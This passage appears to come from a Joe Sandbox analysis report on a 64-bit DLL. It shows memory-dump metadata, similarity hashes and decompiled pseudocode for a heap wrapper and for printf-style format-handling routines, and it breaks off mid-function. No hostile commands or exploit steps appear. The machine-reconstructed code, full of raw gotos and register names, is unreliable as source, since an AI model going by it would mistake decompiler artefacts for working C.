                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-2159480749
                                                                      • Opcode ID: e12bde75b498dcf2301a3ad7adf3ceb6c9e95f29d9ee028ad345362893f97218
                                                                      • Instruction ID: b1257be3e2f908f1dd2529a9b7af946fcecda7d919450d03c60c3db7d150442e
                                                                      • Opcode Fuzzy Hash: e12bde75b498dcf2301a3ad7adf3ceb6c9e95f29d9ee028ad345362893f97218
                                                                      • Instruction Fuzzy Hash: 7D216774529780AFD3C9DF28D48A90BBBF0BB89344F806A2DF8C687260D7759548CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00000001180048198(long long __rax) {
                                                                      				signed int _t3;
                                                                      
                                                                      				_t3 = GetProcessHeap();
                                                                      				 *0x80072088 = __rax;
                                                                      				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                      			}




                                                                      0x18004819c
                                                                      0x1800481a5
                                                                      0x1800481b3

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: 32917af188f0279a018bcd031cbb80975c23caed2b7138c6531a4566827aba6f
                                                                      • Instruction ID: 9663c878a0b10e5d5e05c19db7434f01174b55cc95ffec528ac78e228b9b3088
                                                                      • Opcode Fuzzy Hash: 32917af188f0279a018bcd031cbb80975c23caed2b7138c6531a4566827aba6f
                                                                      • Instruction Fuzzy Hash: D2B09230A03A0DC6EA8A2B116C8234422A8BB5C740F94801AA00C91320DE2D02ED9711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E0000000118002D19C(intOrPtr __edi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				char _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t133;
                                                                      				void* _t136;
                                                                      				void* _t143;
                                                                      				void* _t181;
                                                                      				unsigned int _t182;
                                                                      				signed char _t183;
                                                                      				signed short _t214;
                                                                      				intOrPtr _t217;
                                                                      				signed short _t226;
                                                                      				void* _t227;
                                                                      				signed long long _t298;
                                                                      				void* _t314;
                                                                      				void* _t316;
                                                                      				void* _t317;
                                                                      				intOrPtr* _t318;
                                                                      				signed short* _t320;
                                                                      				void* _t334;
                                                                      				signed long long _t336;
                                                                      				signed int* _t340;
                                                                      				void* _t348;
                                                                      				signed long long _t349;
                                                                      				void* _t351;
                                                                      				void* _t357;
                                                                      				void* _t361;
                                                                      				signed long long _t364;
                                                                      				void* _t366;
                                                                      				intOrPtr _t367;
                                                                      				intOrPtr* _t368;
                                                                      
                                                                      				_t361 = __r10;
                                                                      				_t351 = __r8;
                                                                      				_t342 = __rbp;
                                                                      				_t339 = __rsi;
                                                                      				_t316 = __rcx;
                                                                      				_t217 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t349 = _t348 - 0x50;
                                                                      				_t298 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t298 ^ _t349;
                                                                      				_t133 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t314 = __rcx;
                                                                      				_t6 = _t339 - 0x20; // 0x58
                                                                      				_t226 = _t6;
                                                                      				_t7 = _t339 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t227 = _t133 - 0x64;
                                                                      				if (_t227 > 0) goto 0x8002d252;
                                                                      				if (_t227 == 0) goto 0x8002d2c3;
                                                                      				if (_t133 == 0x41) goto 0x8002d2d0;
                                                                      				if (_t133 == 0x43) goto 0x8002d22f;
                                                                      				if (_t133 - 0x44 <= 0) goto 0x8002d2dc;
                                                                      				if (_t133 - 0x47 <= 0) goto 0x8002d2d0;
                                                                      				if (_t133 == 0x53) goto 0x8002d285;
                                                                      				if (_t133 == _t226) goto 0x8002d245;
                                                                      				if (_t133 == 0x5a) goto 0x8002d23b;
                                                                      				if (_t133 == 0x61) goto 0x8002d2d0;
                                                                      				if (_t133 != 0x63) goto 0x8002d2dc;
                                                                      				E00000001180031618(_t133 - 0x63, __rcx, __rcx, __rsi, __rbp);
                                                                      				goto 0x8002d2d5;
                                                                      				E0000000118002F058(_t181, _t133 - 0x63, __rcx, __rcx, _t339);
                                                                      				goto 0x8002d2d5;
                                                                      				_t136 = E0000000118001F104(r12b, 0x78, _t314, _t316, _t334, _t339, _t351, __r10);
                                                                      				goto 0x8002d2d5;
                                                                      				if (_t136 - 0x67 <= 0) goto 0x8002d2d0;
                                                                      				if (_t136 == 0x69) goto 0x8002d2c3;
                                                                      				if (_t136 == 0x6e) goto 0x8002d2bc;
                                                                      				if (_t136 == 0x6f) goto 0x8002d29c;
                                                                      				if (_t136 == 0x70) goto 0x8002d28c;
                                                                      				if (_t136 == 0x73) goto 0x8002d285;
                                                                      				if (_t136 == 0x75) goto 0x8002d2c7;
                                                                      				if (_t136 != 0x78) goto 0x8002d2dc;
                                                                      				goto 0x8002d248;
                                                                      				E00000001180032AEC(_t136 - 0x78, _t314, _t316, _t339, _t342);
                                                                      				goto 0x8002d2d5;
                                                                      				 *((intOrPtr*)(_t316 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t316 + 0x34)) = 0xb;
                                                                      				goto 0x8002d245;
                                                                      				_t182 =  *(_t316 + 0x28);
                                                                      				if ((r12b & _t182 >> 0x00000005) == 0) goto 0x8002d2b0;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t314 + 0x28) = _t182;
                                                                      				_t317 = _t314;
                                                                      				E0000000118001C0F4(0, 0x78, _t314, _t317, _t334, _t339, _t351, __r10);
                                                                      				goto 0x8002d2d5;
                                                                      				E00000001180032030(r12b & _t182 >> 0x00000005, _t317, _t339, _t342, __r10);
                                                                      				goto 0x8002d2d5;
                                                                      				 *(_t317 + 0x28) =  *(_t317 + 0x28) | 0x00000010;
                                                                      				E0000000118001D8FC(0, 0x78, _t314, _t317, _t334, _t339, _t351, __r10);
                                                                      				goto 0x8002d2d5;
                                                                      				_t143 = E00000001180030384(0, _t217, _t314, _t317, _t342);
                                                                      				r13d = 0;
                                                                      				if (_t143 != 0) goto 0x8002d2e3;
                                                                      				goto 0x8002d655;
                                                                      				if ( *((intOrPtr*)(_t314 + 0x474)) != 2) goto 0x8002d2f9;
                                                                      				if ( *((intOrPtr*)(_t314 + 0x470)) == r12d) goto 0x8002d652;
                                                                      				if ( *((intOrPtr*)(_t314 + 0x38)) != r13b) goto 0x8002d652;
                                                                      				_t183 =  *(_t314 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r10d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x8002d357;
                                                                      				if ((r12b & 0) == 0) goto 0x8002d339;
                                                                      				_v68 = _t361 + 0xd;
                                                                      				goto 0x8002d354;
                                                                      				if ((r12b & _t183) == 0) goto 0x8002d345;
                                                                      				goto 0x8002d332;
                                                                      				if ((r12b & 0) == 0) goto 0x8002d357;
                                                                      				_v68 = r10w;
                                                                      				_t336 = _t364;
                                                                      				_t214 =  *(_t314 + 0x3a) & 0x0000ffff;
                                                                      				r9d = 0xffdf;
                                                                      				if ((r9w & (_t214 & 0x0000ffff) - _t226) != 0) goto 0x8002d37a;
                                                                      				r8b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8002d37d;
                                                                      				r8b = r13b;
                                                                      				r9d = 0x30;
                                                                      				if (r8b != 0) goto 0x8002d396;
                                                                      				if (0 == 0) goto 0x8002d3b3;
                                                                      				 *(_t349 + 0x34 + _t336 * 2) = r9w;
                                                                      				if (_t214 == _t226) goto 0x8002d3a7;
                                                                      				if (_t214 != 0x41) goto 0x8002d3aa;
                                                                      				 *((short*)(_t349 + 0x36 + _t336 * 2)) = _t226 & 0x0000ffff;
                                                                      				r15d =  *((intOrPtr*)(_t314 + 0x2c));
                                                                      				r14d = 0xffff;
                                                                      				r15d = r15d -  *((intOrPtr*)(_t314 + 0x48));
                                                                      				r15d = r15d - _t217;
                                                                      				if ((_t183 & 0x0000000c) != 0) goto 0x8002d42e;
                                                                      				if (r15d <= 0) goto 0x8002d42e;
                                                                      				if ((r12b &  *( *((intOrPtr*)(_t314 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002d3f4;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t314 + 0x460)) + 8)) == _t366) goto 0x8002d412;
                                                                      				if (E000000011800414D8(r10d, _t314,  *((intOrPtr*)(_t314 + 0x460)),  *((intOrPtr*)(_t314 + 8)), _t357) == r14w) goto 0x8002d42a;
                                                                      				r10d = 0x20;
                                                                      				 *(_t314 + 0x20) = _t317 + 1;
                                                                      				if ( *(_t314 + 0x20) == 0xfffffffe) goto 0x8002d42e;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002d3d5;
                                                                      				goto 0x8002d42e;
                                                                      				 *(_t314 + 0x20) =  *(_t314 + 0x20) | 0xffffffff;
                                                                      				_t368 = _t314 + 0x460;
                                                                      				_t340 = _t314 + 0x20;
                                                                      				if ((r12b &  *( *_t368 + 0x14) >> 0x0000000c) == 0) goto 0x8002d458;
                                                                      				if ( *((intOrPtr*)( *_t368 + 8)) != _t366) goto 0x8002d458;
                                                                      				 *_t340 =  *_t340 + _t217;
                                                                      				goto 0x8002d470;
                                                                      				_v88 =  *((intOrPtr*)(_t314 + 8));
                                                                      				r8d = _t217;
                                                                      				_t318 = _t368;
                                                                      				E000000011800362BC(_t314, _t318,  &_v68, _t340,  *((intOrPtr*)(_t314 + 8)), _t340);
                                                                      				if ((r12b & 0) == 0) goto 0x8002d4db;
                                                                      				if ((r12b &  *(_t314 + 0x28) >> 0x00000002) != 0) goto 0x8002d4db;
                                                                      				if (r15d <= 0) goto 0x8002d4db;
                                                                      				if ((r12b &  *( *_t368 + 0x14) >> 0x0000000c) == 0) goto 0x8002d4a8;
                                                                      				if ( *((intOrPtr*)( *_t368 + 8)) == _t366) goto 0x8002d4c2;
                                                                      				if (E000000011800414D8(0x30, _t314,  *_t368,  *((intOrPtr*)(_t314 + 8)), _t340) == 0xffff) goto 0x8002d4d8;
                                                                      				_t85 = _t318 + 1; // 0x10000
                                                                      				 *_t340 = _t85;
                                                                      				if ( *_t340 == 0xfffffffe) goto 0x8002d4db;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002d491;
                                                                      				goto 0x8002d4db;
                                                                      				 *_t340 =  *_t340 | 0xffffffff;
                                                                      				if ( *((intOrPtr*)(_t314 + 0x4c)) != r13b) goto 0x8002d60c;
                                                                      				if ( *((intOrPtr*)(_t314 + 0x48)) <= 0) goto 0x8002d60c;
                                                                      				_t367 =  *((intOrPtr*)(_t314 + 8));
                                                                      				if ( *((intOrPtr*)(_t367 + 0x28)) != 0) goto 0x8002d509;
                                                                      				E000000011800338E0( *_t368, _t314, _t367,  *_t368, _t340);
                                                                      				if ( *((intOrPtr*)(_t314 + 0x48)) == 0) goto 0x8002d58e;
                                                                      				_t92 = _t367 + 0x18; // 0x4c08245c8948cccc
                                                                      				_v72 = 0;
                                                                      				_t320 =  &_v72;
                                                                      				if (E00000001180040E3C(0, _t226, _t314, _t320,  *((intOrPtr*)(_t314 + 0x40)), _t336 + 2, _t340,  *((intOrPtr*)(_t314 + 0x40)),  *((intOrPtr*)( *_t92 + 8)),  *((intOrPtr*)(_t314 + 8))) <= 0) goto 0x8002d600;
                                                                      				if (( *( *_t368 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8002d55d;
                                                                      				if ( *((long long*)( *_t368 + 8)) == 0) goto 0x8002d56f;
                                                                      				if (E000000011800414D8(_v72 & 0x0000ffff, _t314,  *_t368,  *((intOrPtr*)(_t314 + 8)),  *((intOrPtr*)(_t314 + 8))) == 0xffff) goto 0x8002d574;
                                                                      				 *(_t314 + 0x20) =  *(_t314 + 0x20) + 1;
                                                                      				goto 0x8002d578;
                                                                      				 *(_t314 + 0x20) =  *(_t314 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				if (0 + r12d !=  *((intOrPtr*)(_t314 + 0x48))) goto 0x8002d513;
                                                                      				r13d = 0;
                                                                      				if ( *_t340 - r13d < 0) goto 0x8002d652;
                                                                      				if ((r12b & 0) == 0) goto 0x8002d652;
                                                                      				if (r15d <= 0) goto 0x8002d652;
                                                                      				if ((r12b &  *( *_t368 + 0x14) >> 0x0000000c) == 0) goto 0x8002d5d0;
                                                                      				if ( *((intOrPtr*)( *_t368 + 8)) == _t367) goto 0x8002d5ea;
                                                                      				if (E000000011800414D8(0x20, _t314,  *_t368,  *((intOrPtr*)(_t314 + 8)),  *((intOrPtr*)(_t314 + 8))) == 0xffff) goto 0x8002d64f;
                                                                      				_t117 = _t320 + 1; // 0x10000
                                                                      				 *_t340 = _t117;
                                                                      				if ( *_t340 == 0xfffffffe) goto 0x8002d652;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002d5b9;
                                                                      				goto 0x8002d652;
                                                                      				 *(_t314 + 0x20) =  *(_t314 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				goto 0x8002d58e;
                                                                      				r8d =  *((intOrPtr*)(_t314 + 0x48));
                                                                      				if ((r12b &  *( *_t368 + 0x14) >> 0x0000000c) == 0) goto 0x8002d637;
                                                                      				if ( *((intOrPtr*)( *_t368 + 8)) != _t367) goto 0x8002d637;
                                                                      				 *_t340 =  *_t340 + r8d;
                                                                      				goto 0x8002d591;
                                                                      				_v88 =  *((intOrPtr*)(_t314 + 8));
                                                                      				E000000011800362BC(_t314, _t368,  *((intOrPtr*)(_t314 + 0x40)), _t340,  *((intOrPtr*)(_t314 + 0x40)) + _t170, _t340);
                                                                      				goto 0x8002d591;
                                                                      				 *_t340 =  *_t340 | 0xffffffff;
                                                                      				return E000000011800028F0(r12b,  *( *_t368 + 0x14) >> 0xc, _v56 ^ _t349);
                                                                      			}






































                                                                      0x18002d19c
                                                                      0x18002d19c
                                                                      0x18002d19c
                                                                      0x18002d19c
                                                                      0x18002d19c
                                                                      0x18002d19c
                                                                      0x18002d19c
                                                                      0x18002d1a1
                                                                      0x18002d1a6
                                                                      0x18002d1b4
                                                                      0x18002d1b8
                                                                      0x18002d1c2
                                                                      0x18002d1c7
                                                                      0x18002d1d0
                                                                      0x18002d1d3
                                                                      0x18002d1d3
                                                                      0x18002d1d6
                                                                      0x18002d1d6
                                                                      0x18002d1da
                                                                      0x18002d1de
                                                                      0x18002d1e0
                                                                      0x18002d1ea
                                                                      0x18002d1f4
                                                                      0x18002d1fa
                                                                      0x18002d204
                                                                      0x18002d20e
                                                                      0x18002d213
                                                                      0x18002d219
                                                                      0x18002d21f
                                                                      0x18002d229
                                                                      0x18002d231
                                                                      0x18002d236
                                                                      0x18002d23b
                                                                      0x18002d240
                                                                      0x18002d248
                                                                      0x18002d24d
                                                                      0x18002d256
                                                                      0x18002d25c
                                                                      0x18002d262
                                                                      0x18002d268
                                                                      0x18002d26e
                                                                      0x18002d274
                                                                      0x18002d27a
                                                                      0x18002d27f
                                                                      0x18002d283
                                                                      0x18002d285
                                                                      0x18002d28a
                                                                      0x18002d28c
                                                                      0x18002d293
                                                                      0x18002d29a
                                                                      0x18002d29c
                                                                      0x18002d2a7
                                                                      0x18002d2a9
                                                                      0x18002d2ad
                                                                      0x18002d2b2
                                                                      0x18002d2b5
                                                                      0x18002d2ba
                                                                      0x18002d2bc
                                                                      0x18002d2c1
                                                                      0x18002d2c3
                                                                      0x18002d2c9
                                                                      0x18002d2ce
                                                                      0x18002d2d0
                                                                      0x18002d2d5
                                                                      0x18002d2da
                                                                      0x18002d2de
                                                                      0x18002d2ea
                                                                      0x18002d2f3
                                                                      0x18002d2fd
                                                                      0x18002d303
                                                                      0x18002d308
                                                                      0x18002d30f
                                                                      0x18002d314
                                                                      0x18002d322
                                                                      0x18002d32c
                                                                      0x18002d332
                                                                      0x18002d337
                                                                      0x18002d33c
                                                                      0x18002d343
                                                                      0x18002d34c
                                                                      0x18002d34e
                                                                      0x18002d354
                                                                      0x18002d357
                                                                      0x18002d35b
                                                                      0x18002d36b
                                                                      0x18002d36f
                                                                      0x18002d378
                                                                      0x18002d37a
                                                                      0x18002d384
                                                                      0x18002d390
                                                                      0x18002d394
                                                                      0x18002d396
                                                                      0x18002d39f
                                                                      0x18002d3a5
                                                                      0x18002d3aa
                                                                      0x18002d3b3
                                                                      0x18002d3b7
                                                                      0x18002d3bd
                                                                      0x18002d3c1
                                                                      0x18002d3c7
                                                                      0x18002d3d3
                                                                      0x18002d3e5
                                                                      0x18002d3f2
                                                                      0x18002d40a
                                                                      0x18002d40c
                                                                      0x18002d418
                                                                      0x18002d41e
                                                                      0x18002d426
                                                                      0x18002d428
                                                                      0x18002d42a
                                                                      0x18002d432
                                                                      0x18002d43c
                                                                      0x18002d449
                                                                      0x18002d452
                                                                      0x18002d454
                                                                      0x18002d456
                                                                      0x18002d458
                                                                      0x18002d465
                                                                      0x18002d468
                                                                      0x18002d46b
                                                                      0x18002d47b
                                                                      0x18002d483
                                                                      0x18002d48f
                                                                      0x18002d49d
                                                                      0x18002d4a6
                                                                      0x18002d4c0
                                                                      0x18002d4c4
                                                                      0x18002d4c7
                                                                      0x18002d4cc
                                                                      0x18002d4d4
                                                                      0x18002d4d6
                                                                      0x18002d4d8
                                                                      0x18002d4df
                                                                      0x18002d4ea
                                                                      0x18002d4f0
                                                                      0x18002d4fa
                                                                      0x18002d4ff
                                                                      0x18002d511
                                                                      0x18002d513
                                                                      0x18002d51e
                                                                      0x18002d523
                                                                      0x18002d536
                                                                      0x18002d551
                                                                      0x18002d55b
                                                                      0x18002d56d
                                                                      0x18002d56f
                                                                      0x18002d572
                                                                      0x18002d574
                                                                      0x18002d57b
                                                                      0x18002d58c
                                                                      0x18002d58e
                                                                      0x18002d594
                                                                      0x18002d5a3
                                                                      0x18002d5b3
                                                                      0x18002d5c5
                                                                      0x18002d5ce
                                                                      0x18002d5e8
                                                                      0x18002d5ec
                                                                      0x18002d5ef
                                                                      0x18002d5f4
                                                                      0x18002d5fc
                                                                      0x18002d5fe
                                                                      0x18002d600
                                                                      0x18002d604
                                                                      0x18002d60a
                                                                      0x18002d613
                                                                      0x18002d624
                                                                      0x18002d62d
                                                                      0x18002d62f
                                                                      0x18002d632
                                                                      0x18002d637
                                                                      0x18002d645
                                                                      0x18002d64a
                                                                      0x18002d64f
                                                                      0x18002d67f

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6030846c4851cb75c1268620e0a79d6a89c157537bdfc3530be8bb6f4de5c816
                                                                      • Instruction ID: 9cb584a846f169228bbaac6197fa9e374df9ca447f0194b81601ad033fd1663d
                                                                      • Opcode Fuzzy Hash: 6030846c4851cb75c1268620e0a79d6a89c157537bdfc3530be8bb6f4de5c816
                                                                      • Instruction Fuzzy Hash: 6FE1BC3620064C86EBEBDE1990543E923A1F75DBD8F59C127AE89473D4CEB5CE8AC301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E0000000118002CCCC(intOrPtr __edi, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				char _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t131;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t179;
                                                                      				unsigned int _t180;
                                                                      				signed char _t181;
                                                                      				signed short _t212;
                                                                      				intOrPtr _t215;
                                                                      				signed short _t224;
                                                                      				void* _t225;
                                                                      				signed long long _t294;
                                                                      				long long _t310;
                                                                      				long long _t312;
                                                                      				long long _t313;
                                                                      				intOrPtr* _t314;
                                                                      				signed short* _t316;
                                                                      				void* _t320;
                                                                      				signed long long _t331;
                                                                      				signed int* _t335;
                                                                      				void* _t343;
                                                                      				signed long long _t344;
                                                                      				void* _t346;
                                                                      				void* _t352;
                                                                      				void* _t356;
                                                                      				signed long long _t359;
                                                                      				void* _t361;
                                                                      				intOrPtr _t362;
                                                                      				intOrPtr* _t363;
                                                                      
                                                                      				_t356 = __r10;
                                                                      				_t346 = __r8;
                                                                      				_t337 = __rbp;
                                                                      				_t334 = __rsi;
                                                                      				_t320 = __rdx;
                                                                      				_t312 = __rcx;
                                                                      				_t215 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t344 = _t343 - 0x50;
                                                                      				_t294 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t294 ^ _t344;
                                                                      				_t131 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t310 = __rcx;
                                                                      				_t6 = _t334 - 0x20; // 0x58
                                                                      				_t224 = _t6;
                                                                      				_t7 = _t334 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t225 = _t131 - 0x64;
                                                                      				if (_t225 > 0) goto 0x8002cd82;
                                                                      				if (_t225 == 0) goto 0x8002cdf3;
                                                                      				if (_t131 == 0x41) goto 0x8002ce00;
                                                                      				if (_t131 == 0x43) goto 0x8002cd5f;
                                                                      				if (_t131 - 0x44 <= 0) goto 0x8002ce0c;
                                                                      				if (_t131 - 0x47 <= 0) goto 0x8002ce00;
                                                                      				if (_t131 == 0x53) goto 0x8002cdb5;
                                                                      				if (_t131 == _t224) goto 0x8002cd75;
                                                                      				if (_t131 == 0x5a) goto 0x8002cd6b;
                                                                      				if (_t131 == 0x61) goto 0x8002ce00;
                                                                      				if (_t131 != 0x63) goto 0x8002ce0c;
                                                                      				E00000001180031554(_t131 - 0x63, __rcx, __rcx, __rsi);
                                                                      				goto 0x8002ce05;
                                                                      				E0000000118002EFDC(_t179, __rcx, __rcx, _t334);
                                                                      				goto 0x8002ce05;
                                                                      				_t134 = E0000000118001EF18(r12b, __rcx, __rcx, _t320, _t334, __rbp, _t346, __r10);
                                                                      				goto 0x8002ce05;
                                                                      				if (_t134 - 0x67 <= 0) goto 0x8002ce00;
                                                                      				if (_t134 == 0x69) goto 0x8002cdf3;
                                                                      				if (_t134 == 0x6e) goto 0x8002cdec;
                                                                      				if (_t134 == 0x6f) goto 0x8002cdcc;
                                                                      				if (_t134 == 0x70) goto 0x8002cdbc;
                                                                      				if (_t134 == 0x73) goto 0x8002cdb5;
                                                                      				if (_t134 == 0x75) goto 0x8002cdf7;
                                                                      				if (_t134 != 0x78) goto 0x8002ce0c;
                                                                      				goto 0x8002cd78;
                                                                      				E00000001180032A54(__rcx, __rcx, _t334);
                                                                      				goto 0x8002ce05;
                                                                      				 *((intOrPtr*)(_t312 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t312 + 0x34)) = 0xb;
                                                                      				goto 0x8002cd75;
                                                                      				_t180 =  *(_t312 + 0x28);
                                                                      				if ((r12b & _t180 >> 0x00000005) == 0) goto 0x8002cde0;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t310 + 0x28) = _t180;
                                                                      				_t313 = _t310;
                                                                      				E0000000118001BF08(0, _t310, _t313, _t320, _t334, _t337, _t346, __r10);
                                                                      				goto 0x8002ce05;
                                                                      				E00000001180031F7C(_t310, _t313);
                                                                      				goto 0x8002ce05;
                                                                      				 *(_t313 + 0x28) =  *(_t313 + 0x28) | 0x00000010;
                                                                      				E0000000118001D710(0, _t310, _t313, _t320, _t334, _t337, _t346, __r10);
                                                                      				goto 0x8002ce05;
                                                                      				_t141 = E00000001180030124(0, _t215, _t310, _t313, _t337);
                                                                      				r13d = 0;
                                                                      				if (_t141 != 0) goto 0x8002ce13;
                                                                      				goto 0x8002d16f;
                                                                      				if ( *((intOrPtr*)(_t310 + 0x38)) != r13b) goto 0x8002d16c;
                                                                      				_t181 =  *(_t310 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r10d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x8002ce71;
                                                                      				if ((r12b & 0) == 0) goto 0x8002ce53;
                                                                      				_v68 = _t356 + 0xd;
                                                                      				goto 0x8002ce6e;
                                                                      				if ((r12b & _t181) == 0) goto 0x8002ce5f;
                                                                      				goto 0x8002ce4c;
                                                                      				if ((r12b & 0) == 0) goto 0x8002ce71;
                                                                      				_v68 = r10w;
                                                                      				_t331 = _t359;
                                                                      				_t212 =  *(_t310 + 0x3a) & 0x0000ffff;
                                                                      				r9d = 0xffdf;
                                                                      				if ((r9w & (_t212 & 0x0000ffff) - _t224) != 0) goto 0x8002ce94;
                                                                      				r8b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8002ce97;
                                                                      				r8b = r13b;
                                                                      				r9d = 0x30;
                                                                      				if (r8b != 0) goto 0x8002ceb0;
                                                                      				if (0 == 0) goto 0x8002cecd;
                                                                      				 *(_t344 + 0x34 + _t331 * 2) = r9w;
                                                                      				if (_t212 == _t224) goto 0x8002cec1;
                                                                      				if (_t212 != 0x41) goto 0x8002cec4;
                                                                      				 *((short*)(_t344 + 0x36 + _t331 * 2)) = _t224 & 0x0000ffff;
                                                                      				r15d =  *((intOrPtr*)(_t310 + 0x2c));
                                                                      				r14d = 0xffff;
                                                                      				r15d = r15d -  *((intOrPtr*)(_t310 + 0x48));
                                                                      				r15d = r15d - _t215;
                                                                      				if ((_t181 & 0x0000000c) != 0) goto 0x8002cf48;
                                                                      				if (r15d <= 0) goto 0x8002cf48;
                                                                      				if ((r12b &  *( *((intOrPtr*)(_t310 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002cf0e;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x460)) + 8)) == _t361) goto 0x8002cf2c;
                                                                      				if (E000000011800414D8(r10d, _t310,  *((intOrPtr*)(_t310 + 0x460)),  *((intOrPtr*)(_t310 + 8)), _t352) == r14w) goto 0x8002cf44;
                                                                      				r10d = 0x20;
                                                                      				 *(_t310 + 0x20) = _t313 + 1;
                                                                      				if ( *(_t310 + 0x20) == 0xfffffffe) goto 0x8002cf48;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002ceef;
                                                                      				goto 0x8002cf48;
                                                                      				 *(_t310 + 0x20) =  *(_t310 + 0x20) | 0xffffffff;
                                                                      				_t363 = _t310 + 0x460;
                                                                      				_t335 = _t310 + 0x20;
                                                                      				if ((r12b &  *( *_t363 + 0x14) >> 0x0000000c) == 0) goto 0x8002cf72;
                                                                      				if ( *((intOrPtr*)( *_t363 + 8)) != _t361) goto 0x8002cf72;
                                                                      				 *_t335 =  *_t335 + _t215;
                                                                      				goto 0x8002cf8a;
                                                                      				_v88 =  *((intOrPtr*)(_t310 + 8));
                                                                      				r8d = _t215;
                                                                      				_t314 = _t363;
                                                                      				E000000011800362BC(_t310, _t314,  &_v68, _t335,  *((intOrPtr*)(_t310 + 8)), _t335);
                                                                      				if ((r12b & 0) == 0) goto 0x8002cff5;
                                                                      				if ((r12b &  *(_t310 + 0x28) >> 0x00000002) != 0) goto 0x8002cff5;
                                                                      				if (r15d <= 0) goto 0x8002cff5;
                                                                      				if ((r12b &  *( *_t363 + 0x14) >> 0x0000000c) == 0) goto 0x8002cfc2;
                                                                      				if ( *((intOrPtr*)( *_t363 + 8)) == _t361) goto 0x8002cfdc;
                                                                      				if (E000000011800414D8(0x30, _t310,  *_t363,  *((intOrPtr*)(_t310 + 8)), _t335) == 0xffff) goto 0x8002cff2;
                                                                      				_t83 = _t314 + 1; // 0x10000
                                                                      				 *_t335 = _t83;
